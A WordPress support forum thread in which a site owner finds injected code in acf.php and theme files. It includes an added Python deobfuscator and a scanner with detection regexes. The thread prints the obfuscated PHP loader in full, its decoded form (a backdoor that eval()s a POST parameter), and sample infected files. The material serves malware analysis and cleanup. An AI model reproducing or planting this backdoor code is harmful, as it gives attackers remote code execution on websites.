Bug or not in acf.php
Hello,
I synchronize Dropbox with my server, and I was surprised by an update to acf.php.
I did a diff between the previous version (on the left) and the new version (on the right), which shows lines of code added.
I checked the latest version, and I found some extra lines at the top.
I restored the previous version of acf.php.
Can you tell me more?
Please find the attached file.
Thanks
There should not be any code up there. I did some looking but I found no information. My first reaction is that your site has been hacked. Do you have any other code on your site that should not be there?
Hello John,
I think that's right, and maybe it's not a problem with your plugin (I think so because I only found "acf.php" yesterday).
When I look for "$_POST['dd']" in the directory, I find many more files, modified more than 1 month ago…
I found these files:
wp-content/themes/yoo_balance_wp/comments.php
wp-content/themes/yoo_balance_wp/sidebar.php
wp-content/themes/yoo_balance_wp/changelog.php
wp-content/themes/yoo_balance_wp/404.php
wp-content/themes/yoo_balance_wp/footer.php
wp-content/themes/yoo_balance_wp/config.php
wp-content/themes/yoo_balance_wp/layouts/attachment.php
wp-content/themes/yoo_balance_wp/layouts/template.config.php
wp-content/themes/yoo_balance_wp/layouts/template.php
wp-content/themes/yoo_balance_wp/layouts/_post.php
wp-content/themes/yoo_balance_wp/layouts/page.php
wp-content/themes/yoo_balance_wp/layouts/page.php
wp-content/themes/yoo_balance_wp/layouts/module.php
wp-content/themes/yoo_balance_wp/layouts/single.php
wp-content/themes/yoo_balance_wp/header.php
wp-content/themes/yoo_balance_wp/index.php
wp-content/themes/yoo_balance_wp/functions.php
wp-content/themes/yoo_balance_wp/functions.php
wp-content/themes/yoo_balance_wp/cache/index.php
About:
/home/www/podologue/wp-content/themes/yoo_balance_wp/functions.php
I found at the beginning:
[code]
<?php
$O00OO0 = urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A"); // character table the names below are picked from
$O00O0O = $O00OO0{3} . $O00OO0{6} . $O00OO0{33} . $O00OO0{30}; // "base"
$O0OO00 = $O00OO0{33} . $O00OO0{10} . $O00OO0{24} . $O00OO0{10} . $O00OO0{24}; // "strtr"
$OO0O00 = $O0OO00{0} . $O00OO0{18} . $O00OO0{3} . $O0OO00{0} . $O0OO00{1} . $O00OO0{24}; // "substr"
$OO0000 = $O00OO0{7} . $O00OO0{13}; // "52"
$O00O0O .= $O00OO0{22} . $O00OO0{36} . $O00OO0{29} . $O00OO0{26} . $O00OO0{30} . $O00OO0{32} . $O00OO0{35} . $O00OO0{26} . $O00OO0{30}; // "base" . "64_decode"
// eval(base64_decode("...")): the decoded string is a second stage that substr()s a key out of a long string, strtr()s the rest with it and base64-decodes the result before eval()ing it again
eval($O00O0O("JE8wTzAwMD0iUHh0RFFxZnpZYWhtd0N2Wk51QmpMWHNNVWtJS0piSEVXT2dGeVZBU0dpUm5sVGRjcm9wZU5GU0JIREpreFViS1lDc0VHWHRmakl3cW5ocEF6Z1JsV1Z2ZW9UeW1hdUxkaU9yY1BaUU1OQjlZVVJ5R0N1TEtyV1NGcEIwdkhDTEpMMFRuV29yS3JXU0Z6MTA3cGFpS0FDTEtyV1NGcEIwOXBDcjB6b2k3RVdHWmdvYnlFSUViZ0N2aEkxdE5uMUxnejJFMXgyUzVnM24wcWtwRnoxMFFBT1NpTWFpMFYzMEdDS1RmVWE4dnhJdFFuS1RGcldUa3JDdlFWWTBBRWRUWHgzTFFnMjR2eEl0UW5LVEZyV1RrckN2UU1ZMEFDV2lLQWx5aEkwcmVUZXdkZzN5ZElteTlObXlkeDJiaXgyd2RBSDBBQ0hpN0JIWnpDbXRvRUlMMWNLNHZwS0dzZ0s1aXgzTER4SzFzcktUUWMyOVBwZndHQ3ZoenBhVDRVSUhaQU93R0N2aHZwQ3l2SkgwQUpIMEFOazQ9IjtldmFsKCc/PicuJE8wME8wTygkTzBPTzAwKCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwKjIpLCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwLCRPTzAwMDApLCRPTzBPMDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw=="));
?>
[/code]
That means:
[code]
<?php
// backdoor: ?fukq=t makes the page eval() whatever is POSTed in the "fuckyou4321" parameter
$fukq = @$_GET['fukq']; if($fukq == 't'){echo(@eval($_POST['fuckyou4321']));exit;}
echo apiRequest();
// ?op=check is the "is my shell still alive" probe; the exit() after return is never reached
function apiRequest(){
if(@$_GET['op'] == 'check')
{
return "connectjbmoveisok";
exit();
}
}
?>
[/code]
So I think this is not the right place, and it's not your plugin.
Sorry for the time you lost!
I'll continue to analyse.
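To see what the loader actually does without running it, here is a small static emulator. It is an added example written for this thread, not code from the original post, from ACF or from WordPress. It re-implements only the PHP pieces this loader family uses (urldecode, string offsets, "." concatenation, strtr, substr, base64_decode) and peels each eval() layer in turn; the STAGE1 constant is a copy of the code quoted above with the line-wrapped base64 argument joined back onto one line, and the function names and the NotLoader exception are my own.

```python
import base64
import re
from urllib.parse import unquote_plus
# Copy of the loader quoted above; the wrapped base64 argument is joined back onto one line.
STAGE1 = r'''<?php
$O00OO0 = urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");
$O00O0O = $O00OO0{3} . $O00OO0{6} . $O00OO0{33} . $O00OO0{30};
$O0OO00 = $O00OO0{33} . $O00OO0{10} . $O00OO0{24} . $O00OO0{10} . $O00OO0{24};
$OO0O00 = $O0OO00{0} . $O00OO0{18} . $O00OO0{3} . $O0OO00{0} . $O0OO00{1} . $O00OO0{24};
$OO0000 = $O00OO0{7} . $O00OO0{13};
$O00O0O .= $O00OO0{22} . $O00OO0{36} . $O00OO0{29} . $O00OO0{26} . $O00OO0{30} . $O00OO0{32} . $O00OO0{35} . $O00OO0{26} . $O00OO0{30};
eval($O00O0O("JE8wTzAwMD0iUHh0RFFxZnpZYWhtd0N2Wk51QmpMWHNNVWtJS0piSEVXT2dGeVZBU0dpUm5sVGRjcm9wZU5GU0JIREpreFViS1lDc0VHWHRmakl3cW5ocEF6Z1JsV1Z2ZW9UeW1hdUxkaU9yY1BaUU1OQjlZVVJ5R0N1TEtyV1NGcEIwdkhDTEpMMFRuV29yS3JXU0Z6MTA3cGFpS0FDTEtyV1NGcEIwOXBDcjB6b2k3RVdHWmdvYnlFSUViZ0N2aEkxdE5uMUxnejJFMXgyUzVnM24wcWtwRnoxMFFBT1NpTWFpMFYzMEdDS1RmVWE4dnhJdFFuS1RGcldUa3JDdlFWWTBBRWRUWHgzTFFnMjR2eEl0UW5LVEZyV1RrckN2UU1ZMEFDV2lLQWx5aEkwcmVUZXdkZzN5ZElteTlObXlkeDJiaXgyd2RBSDBBQ0hpN0JIWnpDbXRvRUlMMWNLNHZwS0dzZ0s1aXgzTER4SzFzcktUUWMyOVBwZndHQ3ZoenBhVDRVSUhaQU93R0N2aHZwQ3l2SkgwQUpIMEFOazQ9IjtldmFsKCc/PicuJE8wME8wTygkTzBPTzAwKCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwKjIpLCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwLCRPTzAwMDApLCRPTzBPMDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw=="));
?>'''

class NotLoader(Exception): pass  # a statement outside the loader grammar: we have reached the real payload

def php_substr(s, start, length=None):  # PHP coerces the "52" the loader passes as a string
    return s[int(start):] if length is None else s[int(start):int(start) + int(length)]

def php_strtr(s, frm, to):
    n = min(len(frm), len(to))  # PHP ignores the tail of the longer argument
    return s.translate(str.maketrans(frm[:n], to[:n]))

# The only builtins this loader family needs; any other call stops the emulation.
PHP_FUNCS = {"urldecode": unquote_plus, "substr": php_substr, "strtr": php_strtr,
             "base64_decode": lambda s: base64.b64decode(s).decode("utf-8", "replace")}

def split_top(text, sep):
    """Split on sep only outside quotes and at parenthesis depth 0; parts come back stripped."""
    parts, cur, depth, quote = [], [], 0, None
    for ch in text:
        if quote:
            quote = None if ch == quote else quote
        elif ch in "'\"":
            quote = ch
        elif ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
        elif ch == sep and depth == 0:
            parts.append("".join(cur))
            cur = []
            continue
        cur.append(ch)
    parts.append("".join(cur))
    return [p.strip() for p in parts if p.strip()]

def evaluate(expr, env):
    """Evaluate the subset these loaders use: int/string literals, $v, $v{i}, $v*n, '.' concat, calls."""
    expr = expr.strip()
    if expr.isdigit():
        return int(expr)
    if len(expr) > 1 and expr[0] in "'\"" and expr[-1] == expr[0] and expr[0] not in expr[1:-1]:
        return expr[1:-1]
    parts = split_top(expr, ".")
    if len(parts) > 1:
        return "".join(str(evaluate(p, env)) for p in parts)
    if m := re.fullmatch(r"\$(\w+)\{(\d+)\}", expr):  # string offset, e.g. $O00OO0{3}
        return env[m.group(1)][int(m.group(2))]
    if m := re.fullmatch(r"\$(\w+)\s*\*\s*(\d+)", expr):
        return int(env[m.group(1)]) * int(m.group(2))
    if m := re.fullmatch(r"\$(\w+)", expr):
        return env[m.group(1)]
    if m := re.fullmatch(r"(\$?\w+)\((.*)\)", expr, re.S):  # f(...) or $v(...) with $v holding the name
        callee, argtext = m.groups()
        fname = env[callee[1:]] if callee.startswith("$") else callee
        if fname not in PHP_FUNCS:
            raise NotLoader(fname)
        return PHP_FUNCS[fname](*[evaluate(a, env) for a in split_top(argtext, ",")])
    raise NotLoader(expr)

def run_loader(src, env):
    """Run one stage; return the string it would hand to eval(), or None if it never calls eval."""
    body = re.sub(r"^<\?php|\?>$", "", src.strip())
    evaled = None
    for stmt in split_top(body, ";"):
        if m := re.fullmatch(r"\$(\w+)\s*(\.?=)\s*(.*)", stmt, re.S):
            name, op, rhs = m.groups()
            value = evaluate(rhs, env)
            env[name] = env.get(name, "") + value if op == ".=" else value
        elif m := re.fullmatch(r"eval\((.*)\)", stmt, re.S):
            evaled = evaluate(m.group(1), env)
        else:
            raise NotLoader(stmt)
    return evaled

def deobfuscate(src, max_depth=10):
    """Peel eval() layers statically; returns every stage, the last one being the real payload."""
    env, stages = {}, [src]
    try:
        while len(stages) <= max_depth and (nxt := run_loader(stages[-1], env)):
            stages.append(nxt)
    except NotLoader:  # a statement the grammar does not cover: the last stage is the payload itself
        pass
    return stages

if __name__ == "__main__":
    print("\n--- next stage ---\n".join(deobfuscate(STAGE1)))
```

Running it prints three stages: the loader, the second stage that stores a long key-plus-ciphertext string and calls strtr()/substr()/base64_decode() through the variables built in stage one, and finally the payload the post shows decoded, which starts with "<?php" and contains the eval of $_POST['fuckyou4321']. Anything the emulator does not understand raises NotLoader and stops, so the payload itself is never executed.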
On this website:
http://gotmls.net/support-topic/wp-site-guardian-warnings/
When I look for "fuckyou4321", I find:
[code]
Parameter: POST.fuckyou4321
Data: echo (123454320+1);exit();
Impact: 7/91
Potential Vectors: Cross Site Scripting, Cross Site Request Forgery, Remote File Execution, Local File Inclusion
[/code]
If I take my last backup, from the 18th of December 2017 (I'm going to restore it; I don't know if a backdoor was added), I don't find the line with $_POST['dd'], and my infected version on Dropbox is from the 18th of January 2017 (the oldest).
The oldest Apache log in /var/log/apache2 is from the 25th of February, so it's impossible to check the request with the GET parameter… 🙁
So it's a hack of my website.
I'm going to install an Apache module to get all information about incoming/outgoing GET/POST requests.
If I'm hacked again, I will get all the information and the page with the XSS bug, hopefully…
http://httpd.apache.org/docs/2.4/mod/mod_dumpio.html
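The search the posts describe (grepping the theme for $_POST['dd'] and turning up a dozen more files) can be turned into a small scanner that walks a WordPress tree and reports which loader indicators fire on each PHP file. This is an added example for this thread, not code from the original post, from ACF or from any plugin: the indicator names and regexes are my own, and the sample files it writes into a temporary directory are constructed for the demonstration, with the infected one shaped like the loader quoted above but carrying a truncated character table and a short fake base64 argument.

```python
import os
import re
import tempfile

# Heuristics for the loader family in the thread and the request-driven eval it drops.
# The names are mine; each regex is a coarse indicator, not a signature of one sample.
INDICATORS = {
    "eval-of-request": re.compile(r"eval\s*\(\s*@?\$_(?:POST|GET|REQUEST|COOKIE)\s*\["),
    "eval-via-variable": re.compile(r"eval\s*\(\s*\$\w+\s*\("),  # eval($x("...")) with $x holding a function name
    "percent-encoded-alphabet": re.compile(r'urldecode\s*\(\s*"(?:[A-Za-z0-9]*%[0-9A-Fa-f]{2}){5,}[A-Za-z0-9]*"\s*\)'),
    "string-offset-chain": re.compile(r"(?:\$\w+\{\d+\}\s*\.\s*){3,}\$\w+\{\d+\}"),
    "decode-then-eval": re.compile(r"eval\s*\(\s*@?\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("),
    "long-base64-blob": re.compile(r'"[A-Za-z0-9+/]{200,}={0,2}"'),
}

# Constructed sample tree: a clean theme file, a theme file with a loader-shaped prefix
# (truncated table, fake base64), and a plugin file with a $_POST-driven eval.
SAMPLES = {
    "wp-content/themes/demo/index.php":
        "<?php get_header(); ?>\n<h1><?php the_title(); ?></h1>\n<?php get_footer(); ?>\n",
    "wp-content/themes/demo/functions.php":
        '<?php\n$O00OO0 = urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79");\n'
        "$O00O0O = $O00OO0{3} . $O00OO0{6} . $O00OO0{33} . $O00OO0{30};\n"
        'eval($O00O0O("JE8wTzAwMD0i"));\n?>\n<?php\nadd_action("init", "demo_init");\n',
    "wp-content/plugins/demo/acf.php":
        "<?php\nif (@$_GET['k'] == 't') { echo(@eval($_POST['dd'])); exit; }\n",
}

def scan_file(path):
    """Return the sorted indicator names that fire on one file (empty list = nothing suspicious)."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        src = fh.read()
    return sorted(name for name, rx in INDICATORS.items() if rx.search(src))

def scan_tree(root, exts=(".php",)):
    """Walk root and map each flagged file (path relative to root, '/' separated) to its indicators."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.endswith(exts):
                continue
            full = os.path.join(dirpath, fn)
            names = scan_file(full)
            if names:
                hits[os.path.relpath(full, root).replace(os.sep, "/")] = names
    return hits

def build_sample_tree():
    """Write SAMPLES into a fresh temporary directory and return its path."""
    root = tempfile.mkdtemp(prefix="wp-scan-")
    for rel, body in SAMPLES.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root

if __name__ == "__main__":
    for rel, names in sorted(scan_tree(build_sample_tree()).items()):
        print(f"{rel}: {', '.join(names)}")
```

Pointed at the real tree (scan_tree("/home/www/podologue")), the functions.php quoted above trips eval-via-variable, percent-encoded-alphabet, string-offset-chain and long-base64-blob, and the decoded backdoor trips eval-of-request. The indicators are heuristics: legitimate plugins call base64_decode too, so treat a hit as a file to open and read, and a clean result as no proof of anything.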